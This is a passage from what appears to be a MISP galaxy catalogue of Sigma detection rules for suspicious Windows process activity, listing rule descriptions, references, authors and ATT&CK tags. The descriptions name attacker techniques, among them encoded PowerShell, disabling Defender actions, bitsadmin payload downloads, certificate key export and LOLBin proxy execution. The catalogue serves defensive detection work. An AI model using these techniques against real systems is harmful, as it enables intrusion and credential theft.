| tags | ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001'] |
Uncommon Extension Shim Database Installation Via Sdbinst.EXE
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Internal MISP references
UUID 18ee686c-38a3-4f65-9f44-48a077141f42 which can be used as unique global reference for Uncommon Extension Shim Database Installation Via Sdbinst.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sdbinst_susp_extension.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.011'] |
Suspicious SYSVOL Domain Group Policy Access
Detects access to domain Group Policies stored in SYSVOL.
Internal MISP references
UUID 05f3c945-dcc8-4393-9f3d-af65077a8f86 which can be used as unique global reference for Suspicious SYSVOL Domain Group Policy Access in MISP communities and other software using the MISP galaxy
External references
- https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100 - webarchive
- https://adsecurity.org/?p=2288 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis, Jonhnathan Ribeiro, oscd.community |
| creation_date | 2018-04-09 |
| falsepositive | ['Administrative activity'] |
| filename | proc_creation_win_susp_sysvol_access.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.006'] |
Related clusters
Suspicious Diantz Alternate Data Stream Execution
Detects the use of diantz.exe to compress a target file into a CAB file that is stored in an Alternate Data Stream (ADS) of the target file.
Internal MISP references
UUID 6b369ced-4b1d-48f1-b427-fdc0de0790bd which can be used as unique global reference for Suspicious Diantz Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-26 |
| falsepositive | ['Very Possible'] |
| filename | proc_creation_win_lolbin_diantz_ads.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.004'] |
Related clusters
Suspicious Encoded PowerShell Command Line
Detects suspicious PowerShell process starts with Base64-encoded commands (e.g. as used by Emotet).
Internal MISP references
UUID ca2092a1-c273-4878-9b4b-0d60115bf5ea which can be used as unique global reference for Suspicious Encoded PowerShell Command Line in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community |
| creation_date | 2018-09-03 |
| falsepositive | No established falsepositives |
| filename | proc_creation_win_powershell_base64_encoded_cmd.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
Potential PowerShell Obfuscation Via Reversed Commands
Detects the presence of reversed PowerShell commands in the CommandLine. This is often used by attackers as a method of obfuscation.
Internal MISP references
UUID b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 which can be used as unique global reference for Potential PowerShell Obfuscation Via Reversed Commands in MISP communities and other software using the MISP galaxy
External references
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 - webarchive
- https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton |
| creation_date | 2020-10-11 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_powershell_cmdline_reversed_strings.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001'] |
Related clusters
Uncommon Child Process Of BgInfo.EXE
Detects uncommon child processes of "BgInfo.exe", which could be a sign of abuse of the binary to proxy execution via an external VBScript.
Internal MISP references
UUID aaf46cdc-934e-4284-b329-34aa701e3771 which can be used as unique global reference for Uncommon Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - webarchive
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community |
| creation_date | 2019-10-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bginfo_uncommon_child_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.005', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202'] |
Related clusters
Certificate Exported Via PowerShell
Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
Internal MISP references
UUID 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb which can be used as unique global reference for Certificate Exported Via PowerShell in MISP communities and other software using the MISP galaxy
External references
- https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - webarchive
- https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-18 |
| falsepositive | ['Legitimate certificate exports by administrators. Additional filters might be required.'] |
| filename | proc_creation_win_powershell_export_certificate.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.execution', 'attack.t1552.004', 'attack.t1059.001'] |
Related clusters
Net WebClient Casing Anomalies
Detects PowerShell command line contents that include suspicious, abnormal casing of the Net.WebClient string (e.g. nEt.WEbCliEnT), as used in obfuscation techniques.
Internal MISP references
UUID c86133ad-4725-4bd0-8170-210788e0a7ba which can be used as unique global reference for Net WebClient Casing Anomalies in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-05-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_webclient_casing.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
Reg Add Suspicious Paths
Detects when an adversary uses the reg.exe utility to add or modify keys or subkeys under suspicious registry paths.
Internal MISP references
UUID b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 which can be used as unique global reference for Reg Add Suspicious Paths in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md - webarchive
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-19 |
| falsepositive | ['Rare legitimate add to registry via cli (to these locations)'] |
| filename | proc_creation_win_reg_susp_paths.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562.001'] |
Related clusters
PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. An attacker might use this technique via the command line to bypass defenses before executing payloads.
Internal MISP references
UUID 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e which can be used as unique global reference for PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' in MISP communities and other software using the MISP galaxy
External references
- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952 - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2 - webarchive
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference - webarchive
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_defender_default_action_modified.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Matt Anderson (Huntress) |
| creation_date | 2025-07-11 |
| falsepositive | ['Highly unlikely'] |
| filename | proc_creation_win_defender_default_action_modified.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
Set Suspicious Files as System Files Using Attrib.EXE
Detects the usage of attrib with the "+s" option to mark scripts or executables located in suspicious locations as system files, hiding them from users and preventing deletion with ordinary user rights. The rule limits the search to specific extensions and directories to avoid false positives.
Internal MISP references
UUID efec536f-72e8-4656-8960-5e85d091345b which can be used as unique global reference for Set Suspicious Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/ - webarchive
- https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - webarchive
- https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_attrib_system_susp_paths.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.001'] |
Related clusters
Suspicious PowerShell Mailbox Export to Share
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation.
Internal MISP references
UUID 889719ef-dd62-43df-86c3-768fb08dc7c0 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share in MISP communities and other software using the MISP galaxy
External references
- https://youtu.be/5mqid-7zp8k?t=2481 - webarchive
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - webarchive
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ - webarchive
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_mailboxexport_share.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.exfiltration'] |
Scripting/CommandLine Process Spawned Regsvr32
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
Internal MISP references
UUID ab37a6ec-6068-432b-a64e-2c7bf95b1d22 which can be used as unique global reference for Scripting/CommandLine Process Spawned Regsvr32 in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ - webarchive
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-26 |
| falsepositive | ['Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary', 'Some legitimate Windows services'] |
| filename | proc_creation_win_regsvr32_susp_parent.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.010'] |
Related clusters
Rundll32 InstallScreenSaver Execution
An attacker may execute an application as an SCR file using "rundll32.exe desk.cpl,InstallScreenSaver".
Internal MISP references
UUID 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 which can be used as unique global reference for Rundll32 InstallScreenSaver Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl - webarchive
- https://lolbas-project.github.io/lolbas/Libraries/Desk/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec |
| creation_date | 2022-04-28 |
| falsepositive | ['Legitimate installation of a new screensaver'] |
| filename | proc_creation_win_rundll32_installscreensaver.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1218.011', 'attack.defense-evasion'] |
Related clusters
Arbitrary File Download Via ConfigSecurityPolicy.EXE
Detects the execution of "ConfigSecurityPolicy.EXE", a binary that is part of Windows Defender and is used to manage its settings. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers to upload or download files.
Internal MISP references
UUID 1f0f6176-6482-4027-b151-00071af39d7e which can be used as unique global reference for Arbitrary File Download Via ConfigSecurityPolicy.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_configsecuritypolicy_download_file.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1567'] |
Related clusters
Suspicious Download From Direct IP Via Bitsadmin
Detects usage of bitsadmin to download a file from a URL that contains an IP address instead of a hostname.
Internal MISP references
UUID 99c840f2-2012-46fd-9141-c761987550ef which can be used as unique global reference for Suspicious Download From Direct IP Via Bitsadmin in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - webarchive
- https://isc.sans.edu/diary/22264 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-06-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bitsadmin_download_direct_ip.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003'] |
Related clusters
WMI Backdoor Exchange Transport Agent
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters.
Internal MISP references
UUID 797011dc-44f4-4e6f-9f10-a8ceefbe566b which can be used as unique global reference for WMI Backdoor Exchange Transport Agent in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-10-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmi_backdoor_exchange_transport_agent.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.003'] |
Related clusters
Suspicious Workstation Locking via Rundll32
Detects a suspicious call, via rundll32, to the user32.dll function that locks the user's workstation.
Internal MISP references
UUID 3b5b0213-0460-4e3f-8937-3abf98ff7dcc which can be used as unique global reference for Suspicious Workstation Locking via Rundll32 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-06-04 |
| falsepositive | ['Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option'] |
| filename | proc_creation_win_rundll32_user32_dll.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious Download From File-Sharing Website Via Bitsadmin
Detects usage of bitsadmin to download a file from a suspicious file-sharing domain.
Internal MISP references
UUID 8518ed3d-f7c9-4601-a26c-f361a4256a0c which can be used as unique global reference for Suspicious Download From File-Sharing Website Via Bitsadmin in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-321a - webarchive
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ - webarchive
- https://isc.sans.edu/diary/22264 - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-06-28 |
| falsepositive | ['Some legitimate apps use this, but limited.'] |
| filename | proc_creation_win_bitsadmin_download_file_sharing_domains.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003'] |
Related clusters
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
Internal MISP references
UUID e9f8f8cc-07cc-4e81-b724-f387db9175e4 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Regasm/ - webarchive
- https://www.fortiguard.com/threat-signal-report/4718?s=09 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.009'] |
Related clusters
JScript Compiler Execution
Detects the execution of "jsc.exe" (JScript Compiler). Attackers might abuse this to compile JScript files on the fly and bypass application whitelisting.
Internal MISP references
UUID 52788a70-f1da-40dd-8fbd-73b5865d6568 which can be used as unique global reference for JScript Compiler Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.phpied.com/make-your-javascript-a-windows-exe/ - webarchive
- https://twitter.com/DissectMalware/status/998797808907046913 - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Jsc/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jsc_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-02 |
| falsepositive | ['Legitimate use to compile JScript by developers.'] |
| filename | proc_creation_win_jsc_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Related clusters
Share And Session Enumeration Using Net.EXE
Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
Internal MISP references
UUID 62510e69-616b-4078-b371-847da438cc03 which can be used as unique global reference for Share And Session Enumeration Using Net.EXE in MISP communities and other software using the MISP galaxy
External references
- https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Endgame, JHasenbusch (ported for oscd.community) |
| creation_date | 2018-10-30 |
| falsepositive | ['Legitimate use of net.exe utility by legitimate user'] |
| filename | proc_creation_win_net_view_share_and_sessions_enum.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1018'] |
Related clusters
Network Reconnaissance Activity
Detects a set of suspicious network-related commands often used in reconnaissance stages.
Internal MISP references
UUID e6313acd-208c-44fc-a0ff-db85d572e90e which can be used as unique global reference for Network Reconnaissance Activity in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-07 |
| falsepositive | ['False positives depend on scripts and administrative tools used in the monitored environment'] |
| filename | proc_creation_win_nslookup_domain_discovery.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087', 'attack.t1082', 'car.2016-03-001'] |
Related clusters
Suspicious Microsoft OneNote Child Process
Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
Internal MISP references
UUID c27515df-97a9-4162-8a60-dc0eeb51b775 which can be used as unique global reference for Suspicious Microsoft OneNote Child Process in MISP communities and other software using the MISP galaxy
External references
- https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 - webarchive
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) |
| creation_date | 2022-10-21 |
| falsepositive | ['File located in the AppData folder with trusted signature'] |
| filename | proc_creation_win_office_onenote_susp_child_processes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1566', 'attack.t1566.001', 'attack.initial-access'] |
Related clusters
Always Install Elevated Windows Installer
Detects the Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privileges.
Internal MISP references
UUID cd951fdc-4b2f-47f5-ba99-a33bf61e3770 which can be used as unique global reference for Always Install Elevated Windows Installer in MISP communities and other software using the MISP galaxy
External references
- https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community |
| creation_date | 2020-10-13 |
| falsepositive | ['System administrator usage', 'Anti virus products', 'WindowsApps located in "C:\Program Files\WindowsApps\"'] |
| filename | proc_creation_win_susp_always_install_elevated_windows_installer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
Regedit as Trusted Installer
Detects regedit started with TrustedInstaller privileges or by ProcessHacker.exe.
Internal MISP references
UUID 883835a7-df45-43e4-bf1d-4268768afda4 which can be used as unique global reference for Regedit as Trusted Installer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-05-27 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_regedit_trustedinstaller.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548'] |
Related clusters
HackTool - SOAPHound Execution
Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
Internal MISP references
UUID e92a4287-e072-4a40-9739-370c106bb750 which can be used as unique global reference for HackTool - SOAPHound Execution in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c - webarchive
- https://github.com/FalconForceTeam/SOAPHound - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @kostastsale |
| creation_date | 2024-01-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_soaphound_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087'] |
Related clusters
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
Internal MISP references
UUID 551d9c1f-816c-445b-a7a6-7a3864720d60 which can be used as unique global reference for Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication - webarchive
- https://github.com/grayhatkiller/SharpExShell - webarchive
- https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Aaron Stratton |
| creation_date | 2023-11-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_office_excel_dcom_lateral_movement.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1021.003', 'attack.lateral-movement'] |
Related clusters
DLL Loaded via CertOC.EXE
Detects when a user installs certificates using CertOC.exe in a way that causes it to load the target DLL file.
Internal MISP references
UUID 242301bc-f92f-4476-8718-78004a6efd9f which can be used as unique global reference for DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Certoc/ - webarchive
- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - webarchive
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml -